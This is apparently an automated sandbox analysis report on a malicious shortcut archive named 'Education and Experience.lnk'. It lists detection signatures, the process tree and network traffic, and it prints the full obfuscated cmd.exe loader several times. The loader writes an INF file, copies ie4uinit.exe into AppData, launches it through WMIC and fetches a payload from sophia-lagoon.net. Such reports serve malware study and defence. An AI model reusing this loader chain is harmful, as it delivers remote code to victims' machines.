Edit tour

Windows Analysis Report
Education and Experience.lnk(1).zip

Overview

General Information

Sample Name:	Education and Experience.lnk(1).zip
Analysis ID:	16737
MD5:	254c94d8e782c1e10fd3021b56638bc7
SHA1:	cc6081254fa2a6f9c472123ad81534769e7dc6d3
SHA256:	af67e631e6c185c8c127267fa57efffe589612feba6d43755ceda0a3104ac1ad
Infos:

Detection

Score:	52
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Very long command line found

Creates processes via WMI

Contains functionality to create processes via WMI

Drops PE files

Uses a known web browser user agent for HTTP communication

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Deletes files inside the Windows folder

Creates COM task schedule object (often to register a task for autostart)

PE file contains sections with non-standard names

Binary contains a suspicious time stamp

Sample execution stops while process was sleeping (likely an evasion)

Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

System is w10x64_ra

cmd.exe (PID: 6460 cmdline: "C:\Windows\System32\cmd.exe" /v /c set "Lucky50=e" && set "Lucky5=$w" && set "Lucky03=version" && set "Lucky10=d" && (for %u in (a) do @set "Lucky87=%~u") && set "Lucky41=Fast" && call set "Lucky59=%Lucky41:~2,1%" && set "Lucky85=init" && set "Lucky7=t" && set "Lucky26=." && set "Lucky23=settings" && set "Lucky55=si" && (for %q in (c) do @set "Lucky29=%~q") && set "Lucky65=!Lucky26!inf" && set "Lucky15=ieu!Lucky85!!Lucky65!" && call !Lucky59!et "Lucky11=%app!Lucky10!ata%\micro!Lucky59!oft\" && !Lucky59!et "Lucky8=!Lucky11!!Lucky15!" && (for %p in ("[!Lucky03!]" "signature = !Lucky5!indows nt$" "[!Lucky10!e!Lucky59!tinationdirs]" "E4139C=01" "[!Lucky10!efaultin!Lucky59!tall.windows7]" "UnRegis!Lucky7!erOCXs=A687D4" "!Lucky10!elfil!Lucky50!s=E4139C" "[A687D4]" "%11%\scro\" "%Lucky51%j,NI,%Lucky21%%Lucky0%%Lucky0%p%Lucky1%%Lucky9%%Lucky9%sophia-lagoon!Lucky26!%Lucky56%/81754783" "[E4139C]" "ieu%Lucky69%!Lucky65!" "[!Lucky59!!Lucky7!rings]" "Lucky69=!Lucky85!" "Lucky0=t;Lucky40" "!Lucky59!ervicen!Lucky87!me=' '" "Lucky21=h" "Lucky1=:;Lucky35" "Lucky9=/" "!Lucky59!hortsvcn!Lucky87!me=' '" "Lucky56=net" "Lucky51=b;Lucky67" "Lucky25=%time%") do @e!Lucky29!ho %~p)>"!Lucky8!" && !Lucky59!et "Lucky2=ie4u!Lucky85!.!Lucky50!xe" && call xcopy /Y /C /Q %win!Lucky10!ir%\!Lucky59!ystem32\!Lucky2! "!Lucky11!*" | set Lucky93=Nation && !Lucky59!t!Lucky87!rt "" wmi!Lucky29! proce!Lucky59!s call !Lucky29!rea!Lucky7!e "!Lucky11!!Lucky2! -base!Lucky23!" | set Lucky28= Occur Elevator Knock Considerations Teens Stool Rankings Offices Message Toward Reviews Discusses Appliances Tasks Scorpion Situations Erase Shock Clean Vault Carriers Twins Disease Dentists Seeks Friends Impulse Vehicles Stand Submissions Night Batteries Cigar Junior Heart Habit Containers Cables Taxes Ostrich Series Incentives Sorts Erode Measurements Investigators Styles Music Actress Items Differ Suits Sources Archives Headphones Texas Emotions Monsters Above Holdings Outputs Characteristics Forecasts Readers Processes Plastic Mosquito Roses Manuals Representatives Editors Elephant Recommendations Roommates Coral Dolphin Offers Focuses Implies Ignore Champions Family Rangers Garlic Blind Evidence Facilities Products Makers Wives Pockets Solaris Vibrant Excess Raven Secrets Celebs Summaries Inherit Crawl Tutorials Stands Upgrade Crowd Betray Orange Patient Entire Weather Cruel Wellness Attention Waters Failures Jewel Buttons Assume Configurations Levels Enemy Labels Memories Ticket Honey Violin Primary Lovers Depends Exceptions Findings Olympics Cousin Kinds Fruits Centres Smart Avoid Mechanic Gorilla Swingers Century Figure Details Renew Careers Embody Shapes Antibodies Motion Interactions Instances Miles Subway Remain Legend Mounts Midnight Mercy Filter Sessions Asthma Shrimp Greetings Autumn MD5: 9D59442313565C2E0860B88BF32B2277)

conhost.exe (PID: 6468 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: C5E9B1D1103EDCEA2E408E9497A5A88F)

cmd.exe (PID: 6520 cmdline: C:\Windows\system32\cmd.exe /S /D /c" call xcopy /Y /C /Q %windir%\system32\ie4uinit.exe "C:\Users\user\AppData\Roaming\microsoft\*" " MD5: 9D59442313565C2E0860B88BF32B2277)

xcopy.exe (PID: 6548 cmdline: xcopy /Y /C /Q C:\Windows\system32\ie4uinit.exe "C:\Users\user\AppData\Roaming\microsoft\*" MD5: F359375C36D2C540DFF1141B11BF2F7F)

cmd.exe (PID: 6532 cmdline: C:\Windows\system32\cmd.exe /S /D /c" set Lucky93=Nation " MD5: 9D59442313565C2E0860B88BF32B2277)

cmd.exe (PID: 6572 cmdline: C:\Windows\system32\cmd.exe /S /D /c" start "" wmic process call create "C:\Users\user\AppData\Roaming\microsoft\ie4uinit.exe -basesettings" " MD5: 9D59442313565C2E0860B88BF32B2277)

WMIC.exe (PID: 6604 cmdline: wmic process call create "C:\Users\user\AppData\Roaming\microsoft\ie4uinit.exe -basesettings" MD5: 29B7D02A3B5F670B5AF2DAF008810863)

conhost.exe (PID: 6612 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: C5E9B1D1103EDCEA2E408E9497A5A88F)

cmd.exe (PID: 6580 cmdline: C:\Windows\system32\cmd.exe /S /D /c" set Lucky28= Occur Elevator Knock Considerations Teens Stool Rankings Offices Message Toward Reviews Discusses Appliances Tasks Scorpion Situations Erase Shock Clean Vault Carriers Twins Disease Dentists Seeks Friends Impulse Vehicles Stand Submissions Night Batteries Cigar Junior Heart Habit Containers Cables Taxes Ostrich Series Incentives Sorts Erode Measurements Investigators Styles Music Actress Items Differ Suits Sources Archives Headphones Texas Emotions Monsters Above Holdings Outputs Characteristics Forecasts Readers Processes Plastic Mosquito Roses Manuals Representatives Editors Elephant Recommendations Roommates Coral Dolphin Offers Focuses Implies Ignore Champions Family Rangers Garlic Blind Evidence Facilities Products Makers Wives Pockets Solaris Vibrant Excess Raven Secrets Celebs Summaries Inherit Crawl Tutorials Stands Upgrade Crowd Betray Orange Patient Entire Weather Cruel Wellness Attention Waters Failures Jewel Buttons Assume Configurations Levels Enemy Labels Memories Ticket Honey Violin Primary Lovers Depends Exceptions Findings Olympics Cousin Kinds Fruits Centres Smart Avoid Mechanic Gorilla Swingers Century Figure Details Renew Careers Embody Shapes Antibodies Motion Interactions Instances Miles Subway Remain Legend Mounts Midnight Mercy Filter Sessions Asthma Shrimp Greetings Autumn" MD5: 9D59442313565C2E0860B88BF32B2277)

ie4uinit.exe (PID: 6680 cmdline: C:\Users\user\AppData\Roaming\microsoft\ie4uinit.exe -basesettings MD5: AD9AD3C852D59FBF125F02A09F1FF405)

ie4uinit.exe (PID: 6712 cmdline: C:\Users\user\AppData\Roaming\microsoft\ie4uinit.exe -ClearIconCache MD5: AD9AD3C852D59FBF125F02A09F1FF405)

rundll32.exe (PID: 6764 cmdline: C:\Windows\system32\RunDll32.exe C:\Windows\system32\migration\WininetPlugin.dll,MigrateCacheForUser /m /0 MD5: F68AF942FD7CCC0E7BAB1A2335D2AD26)

ie4uinit.exe (PID: 6788 cmdline: "C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe" MD5: AD9AD3C852D59FBF125F02A09F1FF405)

ie4uinit.exe (PID: 2792 cmdline: "C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe" MD5: AD9AD3C852D59FBF125F02A09F1FF405)

ie4uinit.exe (PID: 6612 cmdline: "C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe" MD5: AD9AD3C852D59FBF125F02A09F1FF405)

cleanup

HTTP traffic detected: GET /81754783 HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: sophia-lagoon.netConnection: Keep-Alive

Source: unknown

UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: ie4uinit.exe, 00000013.00000003.1580755717.000002474C003000.00000004.00000020.00020000.00000000.sdmp, ie4uinit.exe, 00000013.00000003.1525429471.000002474C00E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://sophia-lagoon.net/81754783
Source: ie4uinit.exe, 00000013.00000003.1525429471.000002474C031000.00000004.00000020.00020000.00000000.sdmp, ie4uinit.exe, 00000013.00000003.1580755717.000002474C033000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://sophia-lagoon.net/81754783WWC:
Source: ie4uinit.exe, 00000013.00000003.1580755717.000002474C003000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://sophia-lagoon.net/81754783lP
Source: xcopy.exe, 0000000E.00000002.1487250753.000002784F9CB000.00000004.00000020.00020000.00000000.sdmp, ie4uinit.exe, 00000013.00000000.1501414620.00007FF63F516000.00000002.00000001.01000000.00000006.sdmp, ie4uinit.exe.14.dr	String found in binary or memory: http://www.baidu.com/favicon.icohttps://suggest.yandex.com.tr/suggest-ff.cgi?srv=ie11&uil=tr&part=
Source: ie4uinit.exe, 00000013.00000002.1582941785.000002474C01E000.00000004.00000020.00020000.00000000.sdmp, ie4uinit.exe, 00000013.00000003.1580755717.000002474C01A000.00000004.00000020.00020000.00000000.sdmp, ie4uinit.exe, 00000013.00000003.1525429471.000002474C00E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com
Source: xcopy.exe, 0000000E.00000002.1487250753.000002784F9CB000.00000004.00000020.00020000.00000000.sdmp, ie4uinit.exe, 00000013.00000000.1501414620.00007FF63F516000.00000002.00000001.01000000.00000006.sdmp, ie4uinit.exe.14.dr	String found in binary or memory: https://suggest.yandex.by/suggest-ff.cgi?srv=ie11&part=
Source: xcopy.exe, 0000000E.00000002.1487250753.000002784F9CB000.00000004.00000020.00020000.00000000.sdmp, ie4uinit.exe, 00000013.00000000.1501414620.00007FF63F516000.00000002.00000001.01000000.00000006.sdmp, ie4uinit.exe.14.dr	String found in binary or memory: https://suggest.yandex.kz/suggest-ff.cgi?srv=ie11&part=
Source: xcopy.exe, 0000000E.00000002.1487250753.000002784F9CB000.00000004.00000020.00020000.00000000.sdmp, ie4uinit.exe, 00000013.00000000.1501414620.00007FF63F516000.00000002.00000001.01000000.00000006.sdmp, ie4uinit.exe.14.dr	String found in binary or memory: https://suggest.yandex.ua/suggest-ff.cgi?srv=ie11&part=
Source: xcopy.exe, 0000000E.00000002.1487250753.000002784F9CB000.00000004.00000020.00020000.00000000.sdmp, ie4uinit.exe, 00000013.00000000.1501414620.00007FF63F516000.00000002.00000001.01000000.00000006.sdmp, ie4uinit.exe.14.dr	String found in binary or memory: https://www.baidu.com/s?tn=80035161_2_dg&wd=
Source: xcopy.exe, 0000000E.00000002.1487250753.000002784F9CB000.00000004.00000020.00020000.00000000.sdmp, ie4uinit.exe, 00000013.00000000.1501414620.00007FF63F516000.00000002.00000001.01000000.00000006.sdmp, ie4uinit.exe.14.dr	String found in binary or memory: https://www.sogou.com/tx?hdq=sogou-wsse-6abba5d8ab1f4f32&query=

Source: unknown

DNS traffic detected: queries for: sophia-lagoon.net

Source: global traffic

System Summary

Very long command line found

Source: unknown

Process created: Commandline size = 2790

Contains functionality to create processes via WMI

Source: WMIC.exe, 00000011.00000002.1515062774.000001AF64030000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: C:\Windows\system32\C:\Windows\System32\Wbem\WMIC.exewmic process call create "C:\Users\user\AppData\Roaming\microsoft\ie4uinit.exe -basesettings" Winsta0\Default

Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe

File deleted: C:\Windows\Temp\OLDF396.tmp

Jump to behavior

Source: C:\Windows\System32\xcopy.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe

Process created: C:\Windows\System32\rundll32.exe C:\Windows\system32\RunDll32.exe C:\Windows\system32\migration\WininetPlugin.dll,MigrateCacheForUser /m /0

Source: unknown	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /v /c set "Lucky50=e" && set "Lucky5=$w" && set "Lucky03=version" && set "Lucky10=d" && (for %u in (a) do @set "Lucky87=%~u") && set "Lucky41=Fast" && call set "Lucky59=%Lucky41:~2,1%" && set "Lucky85=init" && set "Lucky7=t" && set "Lucky26=." && set "Lucky23=settings" && set "Lucky55=si" && (for %q in (c) do @set "Lucky29=%~q") && set "Lucky65=!Lucky26!inf" && set "Lucky15=ieu!Lucky85!!Lucky65!" && call !Lucky59!et "Lucky11=%app!Lucky10!ata%\micro!Lucky59!oft\" && !Lucky59!et "Lucky8=!Lucky11!!Lucky15!" && (for %p in ("[!Lucky03!]" "signature = !Lucky5!indows nt$" "[!Lucky10!e!Lucky59!tinationdirs]" "E4139C=01" "[!Lucky10!efaultin!Lucky59!tall.windows7]" "UnRegis!Lucky7!erOCXs=A687D4" "!Lucky10!elfil!Lucky50!s=E4139C" "[A687D4]" "%11%\scro\" "%Lucky51%j,NI,%Lucky21%%Lucky0%%Lucky0%p%Lucky1%%Lucky9%%Lucky9%sophia-lagoon!Lucky26!%Lucky56%/81754783" "[E4139C]" "ieu%Lucky69%!Lucky65!" "[!Lucky59!!Lucky7!rings]" "Lucky69=!Lucky85!" "Lucky0=t;Lucky40" "!Lucky59!ervicen!Lucky87!me=' '" "Lucky21=h" "Lucky1=:;Lucky35" "Lucky9=/" "!Lucky59!hortsvcn!Lucky87!me=' '" "Lucky56=net" "Lucky51=b;Lucky67" "Lucky25=%time%") do @e!Lucky29!ho %~p)>"!Lucky8!" && !Lucky59!et "Lucky2=ie4u!Lucky85!.!Lucky50!xe" && call xcopy /Y /C /Q %win!Lucky10!ir%\!Lucky59!ystem32\!Lucky2! "!Lucky11!*" \| set Lucky93=Nation && !Lucky59!t!Lucky87!rt "" wmi!Lucky29! proce!Lucky59!s call !Lucky29!rea!Lucky7!e "!Lucky11!!Lucky2! -base!Lucky23!" \| set Lucky28= Occur Elevator Knock Considerations Teens Stool Rankings Offices Message Toward Reviews Discusses Appliances Tasks Scorpion Situations Erase Shock Clean Vault Carriers Twins Disease Dentists Seeks Friends Impulse Vehicles Stand Submissions Night Batteries Cigar Junior Heart Habit Containers Cables Taxes Ostrich Series Incentives Sorts Erode Measurements Investigators Styles Music Actress Items Differ Suits Sources Archives Headphones Texas Emotions Monsters Above Holdings Outputs Characteristics Forecasts Readers Processes Plastic Mosquito Roses Manuals Representatives Editors Elephant Recommendations Roommates Coral Dolphin Offers Focuses Implies Ignore Champions Family Rangers Garlic Blind Evidence Facilities Products Makers Wives Pockets Solaris Vibrant Excess Raven Secrets Celebs Summaries Inherit Crawl Tutorials Stands Upgrade Crowd Betray Orange Patient Entire Weather Cruel Wellness Attention Waters Failures Jewel Buttons Assume Configurations Levels Enemy Labels Memories Ticket Honey Violin Primary Lovers Depends Exceptions Findings Olympics Cousin Kinds Fruits Centres Smart Avoid Mechanic Gorilla Swingers Century Figure Details Renew Careers Embody Shapes Antibodies Motion Interactions Instances Miles Subway Remain Legend Mounts Midnight Mercy Filter Sessions Asthma Shrimp Greetings Autumn
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" call xcopy /Y /C /Q %windir%\system32\ie4uinit.exe "C:\Users\user\AppData\Roaming\microsoft\*" "
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" set Lucky93=Nation "
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\xcopy.exe xcopy /Y /C /Q C:\Windows\system32\ie4uinit.exe "C:\Users\user\AppData\Roaming\microsoft\*"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" start "" wmic process call create "C:\Users\user\AppData\Roaming\microsoft\ie4uinit.exe -basesettings" "
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" set Lucky28= Occur Elevator Knock Considerations Teens Stool Rankings Offices Message Toward Reviews Discusses Appliances Tasks Scorpion Situations Erase Shock Clean Vault Carriers Twins Disease Dentists Seeks Friends Impulse Vehicles Stand Submissions Night Batteries Cigar Junior Heart Habit Containers Cables Taxes Ostrich Series Incentives Sorts Erode Measurements Investigators Styles Music Actress Items Differ Suits Sources Archives Headphones Texas Emotions Monsters Above Holdings Outputs Characteristics Forecasts Readers Processes Plastic Mosquito Roses Manuals Representatives Editors Elephant Recommendations Roommates Coral Dolphin Offers Focuses Implies Ignore Champions Family Rangers Garlic Blind Evidence Facilities Products Makers Wives Pockets Solaris Vibrant Excess Raven Secrets Celebs Summaries Inherit Crawl Tutorials Stands Upgrade Crowd Betray Orange Patient Entire Weather Cruel Wellness Attention Waters Failures Jewel Buttons Assume Configurations Levels Enemy Labels Memories Ticket Honey Violin Primary Lovers Depends Exceptions Findings Olympics Cousin Kinds Fruits Centres Smart Avoid Mechanic Gorilla Swingers Century Figure Details Renew Careers Embody Shapes Antibodies Motion Interactions Instances Miles Subway Remain Legend Mounts Midnight Mercy Filter Sessions Asthma Shrimp Greetings Autumn"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic process call create "C:\Users\user\AppData\Roaming\microsoft\ie4uinit.exe -basesettings"
Source: C:\Windows\System32\wbem\WMIC.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe C:\Users\user\AppData\Roaming\microsoft\ie4uinit.exe -basesettings
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Process created: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe C:\Users\user\AppData\Roaming\microsoft\ie4uinit.exe -ClearIconCache
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Process created: C:\Windows\System32\rundll32.exe C:\Windows\system32\RunDll32.exe C:\Windows\system32\migration\WininetPlugin.dll,MigrateCacheForUser /m /0
Source: unknown	Process created: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe "C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe"
Source: unknown	Process created: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe "C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe"
Source: unknown	Process created: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe "C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" call xcopy /Y /C /Q %windir%\system32\ie4uinit.exe "C:\Users\user\AppData\Roaming\microsoft\*" "
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" set Lucky93=Nation "
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" start "" wmic process call create "C:\Users\user\AppData\Roaming\microsoft\ie4uinit.exe -basesettings" "
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" set Lucky28= Occur Elevator Knock Considerations Teens Stool Rankings Offices Message Toward Reviews Discusses Appliances Tasks Scorpion Situations Erase Shock Clean Vault Carriers Twins Disease Dentists Seeks Friends Impulse Vehicles Stand Submissions Night Batteries Cigar Junior Heart Habit Containers Cables Taxes Ostrich Series Incentives Sorts Erode Measurements Investigators Styles Music Actress Items Differ Suits Sources Archives Headphones Texas Emotions Monsters Above Holdings Outputs Characteristics Forecasts Readers Processes Plastic Mosquito Roses Manuals Representatives Editors Elephant Recommendations Roommates Coral Dolphin Offers Focuses Implies Ignore Champions Family Rangers Garlic Blind Evidence Facilities Products Makers Wives Pockets Solaris Vibrant Excess Raven Secrets Celebs Summaries Inherit Crawl Tutorials Stands Upgrade Crowd Betray Orange Patient Entire Weather Cruel Wellness Attention Waters Failures Jewel Buttons Assume Configurations Levels Enemy Labels Memories Ticket Honey Violin Primary Lovers Depends Exceptions Findings Olympics Cousin Kinds Fruits Centres Smart Avoid Mechanic Gorilla Swingers Century Figure Details Renew Careers Embody Shapes Antibodies Motion Interactions Instances Miles Subway Remain Legend Mounts Midnight Mercy Filter Sessions Asthma Shrimp Greetings Autumn"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\xcopy.exe xcopy /Y /C /Q C:\Windows\system32\ie4uinit.exe "C:\Users\user\AppData\Roaming\microsoft\*"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic process call create "C:\Users\user\AppData\Roaming\microsoft\ie4uinit.exe -basesettings"
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Process created: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe C:\Users\user\AppData\Roaming\microsoft\ie4uinit.exe -ClearIconCache
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Process created: C:\Windows\System32\rundll32.exe C:\Windows\system32\RunDll32.exe C:\Windows\system32\migration\WininetPlugin.dll,MigrateCacheForUser /m /0

Source: C:\Windows\System32\wbem\WMIC.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6612:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6612:120:WilError_02

Source: C:\Windows\System32\wbem\WMIC.exe

WMI Queries: IWbemServices::ExecMethod - ROOT\CIMV2 : Win32_Process::Create

Source: C:\Windows\System32\cmd.exe

File created: C:\Users\user\AppData\Roaming\microsoft\ieuinit.inf

Jump to behavior

Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe

File created: C:\Windows\Temp\OLDF396.tmp

Jump to behavior

Source: classification engine

Classification label: mal52.evad.winZIP@23/9@1/1

Source: C:\Windows\System32\conhost.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\InternetRegistry\REGISTRY\USER\S-1-5-21-2660496737-530772487-1027249058-1002\Software\Microsoft\Office

Source:	Binary string: ie4uinit.pdbGCTL source: xcopy.exe, 0000000E.00000002.1487250753.000002784F9CB000.00000004.00000020.00020000.00000000.sdmp, ie4uinit.exe, 00000013.00000000.1501414620.00007FF63F516000.00000002.00000001.01000000.00000006.sdmp, ie4uinit.exe.14.dr
Source:	Binary string: ie4uinit.pdb source: xcopy.exe, 0000000E.00000002.1487250753.000002784F9CB000.00000004.00000020.00020000.00000000.sdmp, ie4uinit.exe, 00000013.00000000.1501414620.00007FF63F516000.00000002.00000001.01000000.00000006.sdmp, ie4uinit.exe.14.dr

Source: ie4uinit.exe.14.dr

Static PE information: section name: .didat

Source: ie4uinit.exe.14.dr

Static PE information: 0xEF6764A3 [Thu Apr 11 14:56:35 2097 UTC]

Persistence and Installation Behavior

Creates processes via WMI

Source: C:\Windows\System32\wbem\WMIC.exe

WMI Queries: IWbemServices::ExecMethod - ROOT\CIMV2 : Win32_Process::Create

Source: C:\Windows\System32\xcopy.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe

Jump to dropped file

Source: C:\Windows\System32\wbem\WMIC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Libraries\desktop.ini
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	File opened: C:\Users\user\AppData
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	File opened: C:\Users\user\AppData\Roaming
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	File opened: C:\Users\user
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft

Source: ie4uinit.exe, 00000013.00000003.1580755717.000002474BFD0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: ie4uinit.exe, 00000013.00000003.1580755717.000002474BFD0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWen-USn

